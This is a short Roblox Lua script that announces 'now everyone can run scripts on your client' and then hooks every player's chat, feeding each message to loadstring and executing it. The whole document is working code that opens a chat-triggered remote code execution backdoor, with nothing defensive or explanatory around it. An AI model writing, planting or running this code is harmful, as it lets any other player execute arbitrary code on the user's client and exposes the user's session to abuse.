print("script ran! now everyone can run scripts on your client") for i,v in pairs(game:GetService("Players"):GetPlayers()) do v.Chatted:Connect(function(msg) print(msg) local a = loadstring(tostring(msg)) a() end) end